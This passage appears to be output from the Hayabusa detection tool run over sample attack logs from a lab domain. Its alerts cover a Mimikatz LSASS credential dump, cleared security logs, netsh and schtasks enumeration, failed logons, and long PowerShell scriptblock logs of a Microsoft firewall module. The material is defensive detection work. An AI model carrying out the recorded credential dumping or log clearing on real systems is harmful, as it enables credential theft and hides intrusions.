05:40:12.867 +09:00,FS03.offsec.lan,1,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx +2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: mimikatz.exe | LID: 0x2e6dea4 | PID: 5040 | PGUID: 7CF65FC7-D04B-6171-1303-000000001200 | Hash: 
SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx +2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx +2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,low,,Process Access,Src Process: C:\TOOLS\Mimikatzx64\mimikatz.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 2032 | Src PGUID: 7CF65FC7-D02C-6171-1203-000000001200 | Tgt PID: 512 | Tgt PGUID: 7CF65FC7-6649-6165-0B00-000000001200,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx +2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx +2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx +2021-10-22 22:39:49.619 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: 
admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx +2021-10-22 22:39:50.927 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh advfirewall show allprofiles | Path: C:\Windows\System32\netsh.exe | PID: 0x1328 | User: admmig | LID: 0x1f4c65f,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx +2021-10-22 22:39:55.502 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh a show allprofiles | Path: C:\Windows\System32\netsh.exe | PID: 0x10c4 | User: admmig | LID: 0x1f4c65f,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx +2021-10-22 23:02:11.218 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx +2021-10-22 23:02:11.902 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: schtasks /query /xml | Path: C:\Windows\System32\schtasks.exe | PID: 0xce0 | User: admmig | LID: 0x1f4c65f,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled 
task configuration enumeration.evtx +2021-10-22 23:02:15.177 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3198a75,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx +2021-10-24 06:50:11.666 +09:00,FS03.offsec.lan,4625,low,,Logon Failure - Unknown Reason,User: - | Type: 10 | Computer: - | IP Addr: 10.23.23.9 | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-failed login with denied access due to account restriction.evtx +2021-10-24 06:51:57.212 +09:00,FS03.offsec.lan,4625,low,,Logon Failure - Unknown Reason,User: - | Type: 10 | Computer: - | IP Addr: 10.23.23.9 | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-failed login with denied access due to account restriction.evtx +2021-10-25 16:23:05.426 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-NetFirewallProfile,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.457 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"@{ ModuleVersion = '2.0.0.0' FormatsToProcess = 'NetSecurity.formats.ps1xml' TypesToProcess = 'NetSecurity.types.ps1xml' NestedModules = @( ""Microsoft.Windows.Firewall.Commands.dll"", 
""NetFirewallRule.cmdletDefinition.cdxml"", ""NetIPsecRule.cmdletDefinition.cdxml"", ""NetIPsecMainModeRule.cmdletDefinition.cdxml"", ""NetFirewallAddressFilter.cmdletDefinition.cdxml"", ""NetFirewallApplicationFilter.cmdletDefinition.cdxml"", ""NetFirewallInterfaceFilter.cmdletDefinition.cdxml"", ""NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml"", ""NetFirewallSecurityFilter.cmdletDefinition.cdxml"", ""NetFirewallPortFilter.cmdletDefinition.cdxml"", ""NetFirewallServiceFilter.cmdletDefinition.cdxml"", ""NetIPsecPhase1AuthSet.cmdletDefinition.cdxml"", ""NetIPsecPhase2AuthSet.cmdletDefinition.cdxml"", ""NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml"", ""NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml"", ""NetFirewallProfile.cmdletDefinition.cdxml"", ""NetIPsecPolicyChange.cmdletDefinition.cdxml"", ""NetIPsecDospSetting.cmdletDefinition.cdxml"", ""NetIPsecIdentity.cmdletDefinition.cdxml"", ""NetIPsecMainModeSA.cmdletDefinition.cdxml"", ""NetIPsecQuickModeSA.cmdletDefinition.cdxml"", ""NetFirewallSetting.cmdletDefinition.cdxml"", ""NetGPO.cmdletDefinition.cdxml"" ) GUID = '{4B26FF51-7AEE-4731-9CF7-508B82532CBF}' Author = 'Microsoft Corporation' CompanyName = 'Microsoft Corporation' PowerShellVersion = '3.0' ClrVersion = '4.0' Copyright = '© Microsoft Corporation. All rights reserved.' 
HelpInfoUri = ""http://go.microsoft.com/fwlink/?linkid=285764"" FunctionsToExport = @( ""Copy-NetFirewallRule"", ""Copy-NetIPsecMainModeCryptoSet"", ""Copy-NetIPsecMainModeRule"", ""Copy-NetIPsecPhase1AuthSet"", ""Copy-NetIPsecPhase2AuthSet"", ""Copy-NetIPsecQuickModeCryptoSet"", ""Copy-NetIPsecRule"", ""Disable-NetFirewallRule"", ""Disable-NetIPsecMainModeRule"", ""Disable-NetIPsecRule"", ""Enable-NetFirewallRule"", ""Enable-NetIPsecMainModeRule"", ""Enable-NetIPsecRule"", ""Get-NetFirewallAddressFilter"", ""Get-NetFirewallApplicationFilter"", ""Get-NetFirewallInterfaceFilter"", ""Get-NetFirewallInterfaceTypeFilter"", ""Get-NetFirewallPortFilter"", ""Get-NetFirewallProfile"", ""Get-NetFirewallRule"", ""Get-NetFirewallSecurityFilter"", ""Get-NetFirewallServiceFilter"", ""Get-NetFirewallSetting"", ""Get-NetIPsecDospSetting"", ""Get-NetIPsecMainModeCryptoSet"", ""Get-NetIPsecMainModeRule"", ""Get-NetIPsecMainModeSA"", ""Get-NetIPsecPhase1AuthSet"", ""Get-NetIPsecPhase2AuthSet"", ""Get-NetIPsecQuickModeCryptoSet"", ""Get-NetIPsecQuickModeSA"", ""Get-NetIPsecRule"", ""New-NetFirewallRule"", ""New-NetIPsecDospSetting"", ""New-NetIPsecMainModeCryptoSet"", ""New-NetIPsecMainModeRule"", ""New-NetIPsecPhase1AuthSet"", ""New-NetIPsecPhase2AuthSet"", ""New-NetIPsecQuickModeCryptoSet"", ""New-NetIPsecRule"", ""Open-NetGPO"", ""Remove-NetFirewallRule"", ""Remove-NetIPsecDospSetting"", ""Remove-NetIPsecMainModeCryptoSet"", ""Remove-NetIPsecMainModeRule"", ""Remove-NetIPsecMainModeSA"", ""Remove-NetIPsecPhase1AuthSet"", ""Remove-NetIPsecPhase2AuthSet"", ""Remove-NetIPsecQuickModeCryptoSet"", ""Remove-NetIPsecQuickModeSA"", ""Remove-NetIPsecRule"", ""Rename-NetFirewallRule"", ""Rename-NetIPsecMainModeCryptoSet"", ""Rename-NetIPsecMainModeRule"", ""Rename-NetIPsecPhase1AuthSet"", ""Rename-NetIPsecPhase2AuthSet"", ""Rename-NetIPsecQuickModeCryptoSet"", ""Rename-NetIPsecRule"", ""Save-NetGPO"", ""Find-NetIPsecRule"", ""Set-NetFirewallAddressFilter"", 
""Set-NetFirewallApplicationFilter"", ""Set-NetFirewallInterfaceFilter"", ""Set-NetFirewallInterfaceTypeFilter"", ""Set-NetFirewallPortFilter"", ""Set-NetFirewallProfile"", ""Set-NetFirewallRule"", ""Set-NetFirewallSecurityFilter"", ""Set-NetFirewallServiceFilter"", ""Set-NetFirewallSetting"", ""Set-NetIPsecDospSetting"", ""Set-NetIPsecMainModeCryptoSet"", ""Set-NetIPsecMainModeRule"", ""Set-NetIPsecPhase1AuthSet"", ""Set-NetIPsecPhase2AuthSet"", ""Set-NetIPsecQuickModeCryptoSet"", ""Set-NetIPsecRule"", ""Show-NetFirewallRule"", ""Show-NetIPsecRule"", ""Sync-NetIPsecRule"", ""Update-NetIPsecRule"" ) CmdletsToExport = @( ""Get-DAPolicyChange"", ""New-NetIPsecAuthProposal"", ""New-NetIPsecMainModeCryptoProposal"", ""New-NetIPsecQuickModeCryptoProposal"" ) AliasesToExport = @( ) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.536 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallRule ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.536 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.536 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 
",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, 
[Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Owner}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Program}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Package}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Service}, [Parameter(ParameterSetName='cim:CreateInstance0')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${LocalUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 
__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'I",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,n'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 